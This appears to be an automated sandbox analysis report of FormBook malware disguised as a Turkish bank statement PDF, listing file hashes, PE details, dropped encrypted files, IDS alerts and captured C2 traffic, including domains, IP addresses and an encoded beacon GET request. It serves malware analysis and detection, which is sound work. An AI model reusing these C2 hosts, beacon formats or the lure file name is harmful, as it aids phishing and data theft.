                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.1*.e_y.e_y.e_y...y%e_y...y.e_y...ywe_y.e^y.e_y...y.e_y"..y.e_y"..y.e_y"..y.e_yRich.e_y................PE..L....i.c.............................<............@.......................................@..........................................`.......................p..........................................@............... ............................text.............................. ..`.rdata...H.......J..................@..@.data....A..........................@....rsrc........`......................@..@.reloc..*#...p...$..................@..B................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\urxpefek.g

                                                Download File
                                                Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):210630
                                                Entropy (8bit):7.998807401765086
                                                Encrypted:true
                                                SSDEEP:3072:sPhff9ccD8Y0B4OJfOCjQlpP+cZPGw9e4LXC+FgVVobx1+GvOMJYpOIARCd58r0j:spfGijQ4KO7P7VrqEOkyOVUdnMXHDM
                                                MD5:1DFD9152477BAEB550B5554F854827B7
                                                SHA1:F952FD15E9E57752B5943EC8B97DD171762F8899
                                                SHA-256:CFA006C9056E7F5CE609B08EAC10DA24424A6CFBB8045B8F3EBC6C0A02B1100D
                                                SHA-512:DAC5969EA31606D6FED42FCDD67D87F8F27C066DB2779E281138BABC7D04B2FA4BC7035AFB3A2ACCFFB3A4CF1D227D5933718E93FDB578503655D72F8E54838A
                                                Malicious:false
                                                Preview:d..P.7v1....R_.bm.........^....x.6wNq.*&...!....nyn..3...j.R..aV{..G.i...F......dz3g......:.r.*(...l.6..O.(....Z....:V.L.]...X.Y...Q.w..E..o.c.;...{....:*..c....KD....^.tuV.p{.9.....& &f.c<.i8....J...z.WO.Y... 30W..'....n.....3.......u.^..c.p..O.`o.....7v1.S.....D.:d..`f....I.J.....6.Nq.*....!....hyn..3...j.R.Z.>{.H..z.3....J+........5...w..}$.....Nk...Zuh.....G:V.L.]....8.c.s....4....\..Y...'.h6i.NA.y.P.....|2.v4.V.p{.9....s.&f.*.~i.n....t.z.WO.Y(.I"R1....Y,..n.....w.......hF.^..c....O.`oZ....7v1.S.....D.$%..`f....!.....x.6wNq.*&...!....nyn..3...j.R.Z.>{.H..z.3....J+........5...w..}$.....Nk...Zuh.....G:V.L.]....8.c.s....4....\..Y...'.h6i.NA.y.P.....|2.v4.V.p{.9.....& &f.e_.i.....0Gt.z.WO.Y(.I"R1....Y...n.....w.......hF.^..c....O.`oZ....7v1.S.....D.$%..`f....!.....x.6wNq.*&...!....nyn..3...j.R.Z.>{.H..z.3....J+........5...w..}$.....Nk...Zuh.....G:V.L.]....8.c.s....4....\..Y...'.h6i.NA.y.P.....|2.v4.V.p{.9.....& &f.e_.i.....0Gt.z.WO.Y(.I"R1....Y...n.....

                                                C:\Users\user\AppData\Local\Temp\xptrw.i

                                                Download File
                                                Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5555
                                                Entropy (8bit):7.175875004069187
                                                Encrypted:false
                                                SSDEEP:96:Farc6oYxg/DrYu3k2XO5oSwY0p1V/FajFAEKf2kSIxGTIgOedwIFcf8m6t+McoQe:FarcR9/hX1S94BcjbBIx7gH1cUmSBQiF
                                                MD5:87643966A5A0CFF0F8A35513D5DE68CE
                                                SHA1:A6B4F982A8B24919DF537FE08351C1052E80E1B3
                                                SHA-256:6DB6E412814A1E393C3E9A9E7C90B7DDB8AFA2A3BCC74A59519EA538F69EE71A
                                                SHA-512:6418D140BCA12A4D599511519ACB9FD01324B888D4FA13F4152180C000D10E3CA416040F281185C51B146DCBFFDE24A9AA139419D799846E717A81788C2997ED
                                                Malicious:false
                                                Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.930644057973553
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File size:311919
                                                MD5:d668ae995548e2dc9b3193cb59ac9c02
                                                SHA1:9419fbd2082f2ac33dd07c457e20839669de6ee7
                                                SHA256:5f2de407396cfb921e5db52d5efb0fbfd44e7257630b079e02f83a1ed61ab4b4
                                                SHA512:93cfb30e2a7e8ed14fe70a0a886438e548ba2b55e198cf8d7653625c03080fb69799f1a1157bd5bcd862e57ed872847d6ec04a4ad2a6a0ccc49fc21c273c20b0
                                                SSDEEP:6144:/Ya6S2FIyqjrz3U+nPkxJ7x+ReF8c5Ao73B1hI3Z378H7qvXNpWYGxN:/YczblP+Jt+W5AozBDio7GXNpAN
                                                TLSH:E264120B3BC5C0A7EC668B310EB54F8A9EB68C156D7D815B27D49E1D7F23580C62E362
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                File Icon

                                                Icon Hash:b2a88c96b2ca6a72

                                                Static PE Info

                                                General

                                                Entrypoint:0x403640
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:61259b55b8912888e90f516ca08dc514

                                                Entrypoint Preview

                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 000003F4h
                                                push ebx
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [ebp-14h], ebx
                                                mov dword ptr [ebp-04h], 0040A230h
                                                mov dword ptr [ebp-10h], ebx
                                                call dword ptr [004080C8h]
                                                mov esi, dword ptr [004080CCh]
                                                lea eax, dword ptr [ebp-00000140h]
                                                push eax
                                                mov dword ptr [ebp-0000012Ch], ebx
                                                mov dword ptr [ebp-2Ch], ebx
                                                mov dword ptr [ebp-28h], ebx
                                                mov dword ptr [ebp-00000140h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007EFEC869083Ah
                                                lea eax, dword ptr [ebp-00000140h]
                                                mov dword ptr [ebp-00000140h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [ebp-0000012Ch]
                                                mov ecx, dword ptr [ebp-00000112h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [ebp-26h], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [ebp-2Ch], ax
                                                cmp dword ptr [ebp-0000013Ch], 0Ah
                                                jnc 00007EFEC869080Ah
                                                and word ptr [ebp-00000132h], 0000h
                                                mov eax, dword ptr [ebp-00000134h]
                                                movzx ecx, byte ptr [ebp-00000138h]
                                                mov dword ptr [0042A318h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [ebp-0000013Ch]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [ebp-2Ch]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xce0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x3b0000xce00xe00False0.4232700892857143data4.226748830857543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                RT_VERSION0x3b7580x248dataEnglishUnited States
                                                RT_MANIFEST0x3b9a00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                Imports

                                                DLLImport
                                                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                192.168.2.7198.54.117.21549730802031453 02/15/23-08:43:11.353362TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.7198.54.117.215
                                                192.168.2.7198.54.117.21549730802031412 02/15/23-08:43:11.353362TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.7198.54.117.215
                                                192.168.2.7198.54.117.21549730802031449 02/15/23-08:43:11.353362TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.7198.54.117.215
                                                192.168.2.78.8.8.850505532023883 02/15/23-08:41:49.483195UDP2023883ET DNS Query to a *.top domain - Likely Hostile5050553192.168.2.78.8.8.8

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 15, 2023 08:41:49.597660065 CET4971580192.168.2.7107.148.8.96
                                                Feb 15, 2023 08:41:49.823132992 CET8049715107.148.8.96192.168.2.7
                                                Feb 15, 2023 08:41:49.823256969 CET4971580192.168.2.7107.148.8.96
                                                Feb 15, 2023 08:41:49.823447943 CET4971580192.168.2.7107.148.8.96
                                                Feb 15, 2023 08:41:50.030577898 CET8049715107.148.8.96192.168.2.7
                                                Feb 15, 2023 08:41:50.030621052 CET8049715107.148.8.96192.168.2.7
                                                Feb 15, 2023 08:41:50.030642033 CET8049715107.148.8.96192.168.2.7
                                                Feb 15, 2023 08:41:50.030899048 CET4971580192.168.2.7107.148.8.96
                                                Feb 15, 2023 08:41:50.031105042 CET4971580192.168.2.7107.148.8.96
                                                Feb 15, 2023 08:41:50.240031004 CET8049715107.148.8.96192.168.2.7
                                                Feb 15, 2023 08:42:00.085928917 CET4971880192.168.2.7194.102.227.30
                                                Feb 15, 2023 08:42:03.092253923 CET4971880192.168.2.7194.102.227.30
                                                Feb 15, 2023 08:42:09.092370987 CET4971880192.168.2.7194.102.227.30
                                                Feb 15, 2023 08:42:22.600156069 CET4971880192.168.2.7194.102.227.30
                                                Feb 15, 2023 08:42:25.609394073 CET4971880192.168.2.7194.102.227.30
                                                Feb 15, 2023 08:42:31.625519037 CET4971880192.168.2.7194.102.227.30
                                                Feb 15, 2023 08:42:45.730077028 CET4972380192.168.2.7194.102.227.30
                                                Feb 15, 2023 08:42:48.736239910 CET4972380192.168.2.7194.102.227.30
                                                Feb 15, 2023 08:42:52.305804968 CET4972480192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:52.480622053 CET8049724184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:52.480812073 CET4972480192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:52.480922937 CET4972480192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:52.655914068 CET8049724184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:52.809778929 CET8049724184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:52.809811115 CET8049724184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:52.809828997 CET8049724184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:52.809843063 CET8049724184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:52.809859037 CET8049724184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:52.809875965 CET8049724184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:52.809963942 CET4972480192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:53.987015009 CET4972480192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:54.736748934 CET4972380192.168.2.7194.102.227.30
                                                Feb 15, 2023 08:42:55.002726078 CET4972580192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:55.177664042 CET8049725184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:55.179856062 CET4972580192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:55.179994106 CET4972580192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:55.354406118 CET8049725184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:55.435777903 CET8049725184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:55.435914040 CET8049725184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:55.435950994 CET8049725184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:55.435983896 CET8049725184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:55.436012983 CET8049725184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:55.436038971 CET8049725184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:42:55.436079025 CET4972580192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:55.436079025 CET4972580192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:55.436130047 CET4972580192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:55.440016031 CET4972580192.168.2.7184.94.215.91
                                                Feb 15, 2023 08:42:55.616503000 CET8049725184.94.215.91192.168.2.7
                                                Feb 15, 2023 08:43:00.568794966 CET4972780192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:00.674977064 CET804972766.96.162.149192.168.2.7
                                                Feb 15, 2023 08:43:00.676290035 CET4972780192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:00.676424980 CET4972780192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:00.781239986 CET804972766.96.162.149192.168.2.7
                                                Feb 15, 2023 08:43:00.794483900 CET804972766.96.162.149192.168.2.7
                                                Feb 15, 2023 08:43:00.794518948 CET804972766.96.162.149192.168.2.7
                                                Feb 15, 2023 08:43:00.794770002 CET4972780192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:02.190731049 CET4972780192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:03.206684113 CET4972880192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:03.305003881 CET804972866.96.162.149192.168.2.7
                                                Feb 15, 2023 08:43:03.306865931 CET4972880192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:03.306972980 CET4972880192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:03.405359030 CET804972866.96.162.149192.168.2.7
                                                Feb 15, 2023 08:43:03.422291994 CET804972866.96.162.149192.168.2.7
                                                Feb 15, 2023 08:43:03.422360897 CET804972866.96.162.149192.168.2.7
                                                Feb 15, 2023 08:43:03.422660112 CET4972880192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:03.422826052 CET4972880192.168.2.766.96.162.149
                                                Feb 15, 2023 08:43:03.520910978 CET804972866.96.162.149192.168.2.7
                                                Feb 15, 2023 08:43:08.473335981 CET4972980192.168.2.7198.54.117.215
                                                Feb 15, 2023 08:43:08.648399115 CET8049729198.54.117.215192.168.2.7
                                                Feb 15, 2023 08:43:08.648550034 CET4972980192.168.2.7198.54.117.215
                                                Feb 15, 2023 08:43:08.648824930 CET4972980192.168.2.7198.54.117.215
                                                Feb 15, 2023 08:43:08.823694944 CET8049729198.54.117.215192.168.2.7
                                                Feb 15, 2023 08:43:08.823725939 CET8049729198.54.117.215192.168.2.7
                                                Feb 15, 2023 08:43:08.823741913 CET8049729198.54.117.215192.168.2.7
                                                Feb 15, 2023 08:43:08.823833942 CET4972980192.168.2.7198.54.117.215
                                                Feb 15, 2023 08:43:10.162383080 CET4972980192.168.2.7198.54.117.215
                                                Feb 15, 2023 08:43:11.176120043 CET4973080192.168.2.7198.54.117.215
                                                Feb 15, 2023 08:43:11.349096060 CET8049730198.54.117.215192.168.2.7
                                                Feb 15, 2023 08:43:11.349287987 CET4973080192.168.2.7198.54.117.215
                                                Feb 15, 2023 08:43:11.353362083 CET4973080192.168.2.7198.54.117.215
                                                Feb 15, 2023 08:43:11.526235104 CET8049730198.54.117.215192.168.2.7
                                                Feb 15, 2023 08:43:11.526259899 CET8049730198.54.117.215192.168.2.7

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 15, 2023 08:41:49.483195066 CET5050553192.168.2.78.8.8.8
                                                Feb 15, 2023 08:41:49.588150978 CET53505058.8.8.8192.168.2.7
                                                Feb 15, 2023 08:42:00.063033104 CET5333653192.168.2.78.8.8.8
                                                Feb 15, 2023 08:42:00.084255934 CET53533368.8.8.8192.168.2.7
                                                Feb 15, 2023 08:42:22.500111103 CET5828353192.168.2.78.8.8.8
                                                Feb 15, 2023 08:42:22.599400043 CET53582838.8.8.8192.168.2.7
                                                Feb 15, 2023 08:42:45.701394081 CET4951653192.168.2.78.8.8.8
                                                Feb 15, 2023 08:42:45.721196890 CET53495168.8.8.8192.168.2.7
                                                Feb 15, 2023 08:42:52.284214973 CET6267953192.168.2.78.8.8.8
                                                Feb 15, 2023 08:42:52.304491997 CET53626798.8.8.8192.168.2.7
                                                Feb 15, 2023 08:43:00.459521055 CET5210453192.168.2.78.8.8.8
                                                Feb 15, 2023 08:43:00.567372084 CET53521048.8.8.8192.168.2.7
                                                Feb 15, 2023 08:43:08.443094969 CET6535653192.168.2.78.8.8.8
                                                Feb 15, 2023 08:43:08.471157074 CET53653568.8.8.8192.168.2.7

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Feb 15, 2023 08:41:49.483195066 CET192.168.2.78.8.8.80xbc88Standard query (0)www.wenzid4.topA (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:42:00.063033104 CET192.168.2.78.8.8.80x1622Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:42:22.500111103 CET192.168.2.78.8.8.80x5f9Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:42:45.701394081 CET192.168.2.78.8.8.80xc2faStandard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:42:52.284214973 CET192.168.2.78.8.8.80x8cb6Standard query (0)www.energybig.xyzA (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:00.459521055 CET192.168.2.78.8.8.80xc6d4Standard query (0)www.genuineinsights.cloudA (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:08.443094969 CET192.168.2.78.8.8.80xc6beStandard query (0)www.octohoki.netA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Feb 15, 2023 08:41:49.588150978 CET8.8.8.8192.168.2.70xbc88No error (0)www.wenzid4.top107.148.8.96A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:42:00.084255934 CET8.8.8.8192.168.2.70x1622No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                Feb 15, 2023 08:42:00.084255934 CET8.8.8.8192.168.2.70x1622No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:42:22.599400043 CET8.8.8.8192.168.2.70x5f9No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                Feb 15, 2023 08:42:22.599400043 CET8.8.8.8192.168.2.70x5f9No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:42:45.721196890 CET8.8.8.8192.168.2.70xc2faNo error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                Feb 15, 2023 08:42:45.721196890 CET8.8.8.8192.168.2.70xc2faNo error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:42:52.304491997 CET8.8.8.8192.168.2.70x8cb6No error (0)www.energybig.xyz184.94.215.91A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:00.567372084 CET8.8.8.8192.168.2.70xc6d4No error (0)www.genuineinsights.cloud66.96.162.149A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:08.471157074 CET8.8.8.8192.168.2.70xc6beNo error (0)www.octohoki.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                Feb 15, 2023 08:43:08.471157074 CET8.8.8.8192.168.2.70xc6beNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:08.471157074 CET8.8.8.8192.168.2.70xc6beNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:08.471157074 CET8.8.8.8192.168.2.70xc6beNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:08.471157074 CET8.8.8.8192.168.2.70xc6beNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:08.471157074 CET8.8.8.8192.168.2.70xc6beNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:08.471157074 CET8.8.8.8192.168.2.70xc6beNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)false
                                                Feb 15, 2023 08:43:08.471157074 CET8.8.8.8192.168.2.70xc6beNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.wenzid4.top
                                                • www.energybig.xyz
                                                • www.genuineinsights.cloud
                                                • www.octohoki.net

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.749715107.148.8.9680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 15, 2023 08:41:49.823447943 CET285OUTGET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZG HTTP/1.1
                                                Host: www.wenzid4.top
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 15, 2023 08:41:50.030621052 CET285INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 15 Feb 2023 07:40:07 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
